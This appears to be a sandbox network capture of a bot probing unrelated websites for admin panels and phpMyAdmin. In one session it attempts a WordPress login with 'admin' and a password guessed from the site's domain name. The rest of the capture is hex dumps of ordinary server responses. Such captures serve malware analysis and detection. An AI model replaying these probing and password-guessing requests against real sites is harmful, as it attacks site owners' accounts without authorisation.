2024-02-20 23:26:20 UTC	360	IN	HTTP/1.1 301 Moved Permanently Server: openresty/1.21.4.1 Date: Tue, 20 Feb 2024 23:26:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: https://sell.sawbrokers.com/domain/stylesense.co.uk/
2024-02-20 23:26:20 UTC	13	IN	Data Raw: 33 0d 0a 20 20 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 3 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
282	192.168.2.6	56315	86.105.245.69	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:20 UTC	175	OUT	GET /admin HTTP/1.1 Host: www.stylesense.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:20 UTC	355	IN	HTTP/1.1 302 Found Server: openresty/1.21.4.1 Date: Tue, 20 Feb 2024 23:26:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1jcqg67re2d1lpt5kl3hrj1r8h; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache location: /
2024-02-20 23:26:20 UTC	11	IN	Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
283	192.168.2.6	56796	104.21.54.169	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:20 UTC	184	OUT	GET /phpmyadmin/ HTTP/1.1 Host: fortressrealcapital.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:21 UTC	1342	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:21 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close x-ob_mode: 1 x-frame-options: DENY referrer-policy: no-referrer content-security-policy: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval' ;style-src 'self' 'unsafe-inline' ;img-src 'self' data: .tile.openstreetmap.org;object-src 'none'; x-content-security-policy: default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data: .tile.openstreetmap.org;object-src 'none'; x-webkit-csp: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none'; x-xss-protection: 1; mode=block x-content-type-options: nosniff x-permitted-cross-domain-policies: none x-robots-tag: noindex, nofollow expires: Tue, 20 Feb 2024 23:26:20 +0000 Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0 pragma: no-cache vary: Accept-Encoding set-cookie: pma_lang_https=en; expires=Thu, 21-Mar-2024 23:26:20 GMT; Max-Age=2592000; path=/phpmyadmin/; secure; HttpOnly; SameSite=Strict set-cookie: phpMyAdmin_https=j26t0os1ij0b028ku3l4hk3shb; path=/phpmyadmin/; secure; HttpOnly; SameSite=Strict
2024-02-20 23:26:21 UTC	499	IN	Data Raw: 6c 61 73 74 2d 6d 6f 64 69 66 69 65 64 3a 20 54 75 65 2c 20 32 30 20 46 65 62 20 32 30 32 34 20 32 33 3a 32 36 3a 32 30 20 47 4d 54 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 38 36 49 78 52 34 67 31 63 34 76 56 73 35 4c 45 64 45 34 47 75 69 68 45 30 57 72 69 4c 6c 25 32 46 41 48 4b 70 49 54 69 6d 74 67 34 25 32 46 4f 46 44 71 57 73 4b 7a 72 49 77 6d 46 76 75 54 6a 4d 25 32 42 68 37 38 65 6b 47 5a 61 76 6d 4b 44 36 71 6a 54 4a 52 50 57 78 4b 74 73 6c 69 69 39 71 6b 61 43 36 53 69 63 71 Data Ascii: last-modified: Tue, 20 Feb 2024 23:26:20 GMTCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=86IxR4g1c4vVs5LEdE4GuihE0WriLl%2FAHKpITimtg4%2FOFDqWsKzrIwmFvuTjM%2Bh78ekGZavmKD6qjTJRPWxKtslii9qkaC6Sicq
2024-02-20 23:26:21 UTC	1369	IN	Data Raw: 34 37 64 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 72 65 66 65 72 72 65 72 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 2c 6e 6f 74 72 61 6e 73 6c Data Ascii: 47da<!doctype html><html lang="en" dir="ltr"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="referrer" content="no-referrer"> <meta name="robots" content="noindex,nofollow,notransl
2024-02-20 23:26:21 UTC	1369	IN	Data Raw: 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 61 6a 61 78 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 6b 65 79 68 61 6e 64 6c 65 72 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2d 75 69 2e 6d 69 6e 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 Data Ascii: src="js/dist/ajax.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/keyhandler.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/vendor/jquery/jquery-ui.min.js?v=5.2.1"></script>
2024-02-20 23:26:21 UTC	1369	IN	Data Raw: 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 64 6f 63 6c 69 6e 6b 73 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 66 75 6e 63 74 69 6f 6e 73 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a Data Ascii: <script data-cfasync="false" type="text/javascript" src="js/dist/doclinks.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/functions.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="j
2024-02-20 23:26:21 UTC	1369	IN	Data Raw: 6a 73 2f 64 69 73 74 2f 63 6f 64 65 6d 69 72 72 6f 72 2f 61 64 64 6f 6e 2f 6c 69 6e 74 2f 73 71 6c 2d 6c 69 6e 74 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 76 65 6e 64 6f 72 2f 74 72 61 63 65 6b 69 74 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 65 72 72 6f 72 5f 72 65 70 6f 72 74 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f Data Ascii: js/dist/codemirror/addon/lint/sql-lint.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/vendor/tracekit.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/error_report.js?v=5.2.1"></
2024-02-20 23:26:21 UTC	1369	IN	Data Raw: 6c 6f 73 65 54 65 78 74 20 3d 20 27 44 6f 6e 65 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 70 72 65 76 54 65 78 74 20 3d 20 27 50 72 65 76 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 6e 65 78 74 54 65 78 74 20 3d 20 27 4e 65 78 74 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 63 75 72 72 65 6e 74 54 65 78 74 20 3d 20 27 54 6f 64 61 79 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 6d 6f 6e 74 68 4e 61 6d 65 73 20 3d 20 5b 0a 20 20 20 20 27 4a 61 6e 75 61 72 79 27 2c 0a 20 20 20 20 27 46 65 62 72 75 61 72 79 27 2c 0a 20 20 20 20 27 4d 61 72 63 68 27 2c 0a 20 20 20 20 Data Ascii: loseText = 'Done'; $.datepicker.regional[''].prevText = 'Prev'; $.datepicker.regional[''].nextText = 'Next'; $.datepicker.regional[''].currentText = 'Today'; $.datepicker.regional[''].monthNames = [ 'January', 'February', 'March',
2024-02-20 23:26:21 UTC	1369	IN	Data Raw: 27 27 5d 2e 73 65 63 6f 6e 64 54 65 78 74 20 3d 20 27 53 65 63 6f 6e 64 27 3b 0a 20 20 24 2e 65 78 74 65 6e 64 28 24 2e 74 69 6d 65 70 69 63 6b 65 72 2e 5f 64 65 66 61 75 6c 74 73 2c 20 24 2e 74 69 6d 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 29 3b 0a 7d 0a 0a 66 75 6e 63 74 69 6f 6e 20 65 78 74 65 6e 64 69 6e 67 56 61 6c 69 64 61 74 6f 72 4d 65 73 73 61 67 65 73 20 28 29 20 7b 0a 20 20 24 2e 65 78 74 65 6e 64 28 24 2e 76 61 6c 69 64 61 74 6f 72 2e 6d 65 73 73 61 67 65 73 2c 20 7b 0a 20 20 20 20 72 65 71 75 69 72 65 64 3a 20 27 54 68 69 73 5c 75 30 30 32 30 66 69 65 6c 64 5c 75 30 30 32 30 69 73 5c 75 30 30 32 30 72 65 71 75 69 72 65 64 27 2c 0a 20 20 20 20 72 65 6d 6f 74 65 3a 20 27 50 6c 65 61 73 65 5c 75 30 30 32 30 66 69 78 5c 75 30 Data Ascii: ''].secondText = 'Second'; $.extend($.timepicker._defaults, $.timepicker.regional['']);}function extendingValidatorMessages () { $.extend($.validator.messages, { required: 'This\u0020field\u0020is\u0020required', remote: 'Please\u0020fix\u0
2024-02-20 23:26:21 UTC	1369	IN	Data Raw: 61 78 3a 20 24 2e 76 61 6c 69 64 61 74 6f 72 2e 66 6f 72 6d 61 74 28 27 50 6c 65 61 73 65 5c 75 30 30 32 30 65 6e 74 65 72 5c 75 30 30 32 30 61 5c 75 30 30 32 30 76 61 6c 75 65 5c 75 30 30 32 30 6c 65 73 73 5c 75 30 30 32 30 74 68 61 6e 5c 75 30 30 32 30 6f 72 5c 75 30 30 32 30 65 71 75 61 6c 5c 75 30 30 32 30 74 6f 5c 75 30 30 32 30 5c 75 30 30 37 42 30 5c 75 30 30 37 44 27 29 2c 0a 20 20 20 20 6d 69 6e 3a 20 24 2e 76 61 6c 69 64 61 74 6f 72 2e 66 6f 72 6d 61 74 28 27 50 6c 65 61 73 65 5c 75 30 30 32 30 65 6e 74 65 72 5c 75 30 30 32 30 61 5c 75 30 30 32 30 76 61 6c 75 65 5c 75 30 30 32 30 67 72 65 61 74 65 72 5c 75 30 30 32 30 74 68 61 6e 5c 75 30 30 32 30 6f 72 5c 75 30 30 32 30 65 71 75 61 6c 5c 75 30 30 32 30 74 6f 5c 75 30 30 32 30 5c 75 30 30 37 42 Data Ascii: ax: $.validator.format('Please\u0020enter\u0020a\u0020value\u0020less\u0020than\u0020or\u0020equal\u0020to\u0020\u007B0\u007D'), min: $.validator.format('Please\u0020enter\u0020a\u0020value\u0020greater\u0020than\u0020or\u0020equal\u0020to\u0020\u007B
2024-02-20 23:26:21 UTC	1369	IN	Data Raw: 75 65 72 79 2f 6a 71 75 65 72 79 2e 76 61 6c 69 64 61 74 65 2e 6d 69 6e 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2d 75 69 2d 74 69 6d 65 70 69 63 6b 65 72 2d 61 64 64 6f 6e 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2e 64 65 62 6f 75 6e 63 65 2d 31 2e 30 2e 36 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 6d 65 6e 75 5f 72 65 73 69 7a 65 72 2e 6a 73 27 2c 20 31 29 0a 20 20 2e 61 64 64 28 27 63 72 6f 73 73 5f 66 72 61 6d 69 6e 67 5f 70 72 6f 74 65 63 74 69 6f 6e 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 6d 65 73 73 61 67 65 73 2e 70 68 70 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 63 6f 6e 66 69 67 2e 6a 73 Data Ascii: uery/jquery.validate.min.js', 0) .add('vendor/jquery/jquery-ui-timepicker-addon.js', 0) .add('vendor/jquery/jquery.debounce-1.0.6.js', 0) .add('menu_resizer.js', 1) .add('cross_framing_protection.js', 0) .add('messages.php', 0) .add('config.js
2024-02-20 23:26:21 UTC	1369	IN	Data Raw: 58 2e 66 69 72 65 4f 6e 6c 6f 61 64 28 27 6e 61 76 69 67 61 74 69 6f 6e 2e 6a 73 27 29 3b 0a 20 20 20 20 20 20 41 4a 41 58 2e 66 69 72 65 4f 6e 6c 6f 61 64 28 27 69 6e 64 65 78 65 73 2e 6a 73 27 29 3b 0a 20 20 20 20 20 20 41 4a 41 58 2e 66 69 72 65 4f 6e 6c 6f 61 64 28 27 63 6f 6d 6d 6f 6e 2e 6a 73 27 29 3b 0a 20 20 20 20 20 20 41 4a 41 58 2e 66 69 72 65 4f 6e 6c 6f 61 64 28 27 70 61 67 65 5f 73 65 74 74 69 6e 67 73 2e 6a 73 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 41 4a 41 58 2e 66 69 72 65 4f 6e 6c 6f 61 64 28 27 76 65 6e 64 6f 72 2f 74 72 61 63 65 6b 69 74 2e 6a 73 27 29 3b 0a 20 20 20 20 20 20 41 4a 41 58 2e 66 69 72 65 4f 6e 6c 6f 61 64 28 27 65 72 72 6f 72 5f 72 65 70 6f 72 74 2e 6a 73 27 29 3b 0a 20 20 20 20 20 20 41 Data Ascii: X.fireOnload('navigation.js'); AJAX.fireOnload('indexes.js'); AJAX.fireOnload('common.js'); AJAX.fireOnload('page_settings.js'); AJAX.fireOnload('vendor/tracekit.js'); AJAX.fireOnload('error_report.js'); A

Session ID	Source IP	Source Port	Destination IP	Destination Port
284	192.168.2.6	56965	81.169.145.86	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:20 UTC	292	OUT	GET /wp-login.php?redirect_to=https%3A%2F%2Fksv-schwimmen.de%2Fwp-admin%2F&reauth=1 HTTP/1.1 Host: ksv-schwimmen.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://ksv-schwimmen.de/wp-login.php
2024-02-20 23:26:22 UTC	188	IN	HTTP/1.1 503 Service Unavailable Date: Tue, 20 Feb 2024 23:26:20 GMT Server: Apache/2.4.58 (Unix) Content-Length: 299 Content-Type: text/html; charset=iso-8859-1 Connection: close
2024-02-20 23:26:22 UTC	299	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 62 6c 65 20 74 6f 20 73 65 72 76 69 63 65 20 79 6f 75 72 0a 72 65 71 75 65 73 74 20 64 75 65 20 74 6f 20 6d 61 69 6e 74 65 6e 61 6e 63 65 20 64 6f 77 6e 74 69 6d 65 20 6f 72 20 63 61 70 61 63 69 74 79 0a 70 72 6f 62 6c 65 6d 73 2e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>503 Service Unavailable</title></head><body><h1>Service Unavailable</h1><p>The server is temporarily unable to service yourrequest due to maintenance downtime or capacityproblems.

Session ID	Source IP	Source Port	Destination IP	Destination Port
285	192.168.2.6	57111	75.2.70.75	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:20 UTC	166	OUT	GET /admin HTTP/1.1 Host: eyegage.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:20 UTC	177	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:20 GMT Content-Type: text/html Content-Length: 166 Connection: close Location: https://www.eyegage.com/admin
2024-02-20 23:26:20 UTC	166	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
286	192.168.2.6	57305	104.21.54.169	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:20 UTC	362	OUT	POST /wp-login.php HTTP/1.1 Host: fortressrealcapital.com Accept: / Accept-Encoding: deflate, gzip Cookie: wordpress_test_cookie=WP%20Cookie%20check User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://fortressrealcapital.com/wp-login.php Content-Length: 138 Content-Type: application/x-www-form-urlencoded
2024-02-20 23:26:20 UTC	138	OUT	Data Raw: 6c 6f 67 3d 61 64 6d 69 6e 26 70 77 64 3d 66 6f 72 74 72 65 73 73 25 32 31 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31 Data Ascii: log=admin&pwd=fortress%21&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Ffortressrealcapital.com%2Fwp-admin%2F&testcookie=1
2024-02-20 23:26:21 UTC	808	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 x-frame-options: SAMEORIGIN set-cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cwEGVCgkbcjFFIKDEpi0Gp%2FcooO9SLVjEIpvFucXc5gjvzpTgntRyHcvtF2nIdtRbXFBq%2BvWV1OyLUyZ5rxQr1lnhH3AqqJ0jADuOJdMq7H%2FjleatU%2FBkKvK85N7Xnb%2FqcKhyZBivFY7fw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 858a8393dd89c33e-EWR alt-svc: h3=":443"; ma=86400
2024-02-20 23:26:21 UTC	561	IN	Data Raw: 31 62 62 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 46 6f 72 74 72 65 73 73 20 52 65 61 6c 20 43 61 70 69 74 61 6c 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 Data Ascii: 1bbc<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; Fortress Real Capital — WordPress</title><meta name='robots' content='noindex, follow' /><link rel='
2024-02-20 23:26:21 UTC	1369	IN	Data Raw: 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 66 6f 72 6d 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 66 6f 72 6d 73 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 33 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6c 31 30 6e 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 31 30 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 33 27 20 74 79 70 65 3d 27 74 Data Ascii: ='stylesheet' id='forms-css' href='https://fortressrealcapital.com/wp-admin/css/forms.min.css?ver=6.4.3' type='text/css' media='all' /><link rel='stylesheet' id='l10n-css' href='https://fortressrealcapital.com/wp-admin/css/l10n.min.css?ver=6.4.3' type='t
2024-02-20 23:26:21 UTC	1369	IN	Data Raw: 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 22 3e 50 6f 77 65 72 65 64 20 62 79 20 57 6f 72 64 50 72 65 73 73 3c 2f 61 3e 3c 2f 68 31 3e 0a 09 3c 64 69 76 20 69 64 3d 22 6c 6f 67 69 6e 5f 65 72 72 6f 72 22 20 63 6c 61 73 73 3d 22 6e 6f 74 69 63 65 20 6e 6f 74 69 63 65 2d 65 72 72 6f 72 22 3e 3c 70 3e 3c 73 74 72 6f 6e 67 3e 45 72 72 6f 72 3a 3c 2f 73 74 72 6f 6e 67 3e 20 54 68 65 20 75 73 65 72 6e 61 6d 65 20 3c 73 74 72 6f 6e 67 3e 61 64 6d 69 6e 3c 2f 73 74 72 6f 6e 67 3e 20 69 73 20 6e 6f 74 20 72 65 67 69 73 74 65 72 65 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 20 49 66 20 79 6f 75 20 61 72 65 20 75 6e 73 75 72 65 20 6f 66 20 79 6f 75 72 20 75 73 65 72 6e 61 6d 65 2c 20 74 72 79 20 79 6f 75 72 20 65 6d Data Ascii: a href="https://wordpress.org/">Powered by WordPress</a></h1><div id="login_error" class="notice notice-error"><p><strong>Error:</strong> The username <strong>admin</strong> is not registered on this site. If you are unsure of your username, try your em
2024-02-20 23:26:21 UTC	1369	IN	Data Raw: 65 6c 3e 3c 2f 70 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 73 75 62 6d 69 74 22 3e 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 6e 61 6d 65 3d 22 77 70 2d 73 75 62 6d 69 74 22 20 69 64 3d 22 77 70 2d 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 62 75 74 74 6f 6e 20 62 75 74 74 6f 6e 2d 70 72 69 6d 61 72 79 20 62 75 74 74 6f 6e 2d 6c 61 72 67 65 22 20 76 61 6c 75 65 3d 22 4c 6f 67 20 49 6e 22 20 2f 3e 0a 09 09 09 09 09 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 72 65 64 69 72 65 63 74 5f 74 6f 22 20 76 61 6c 75 65 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 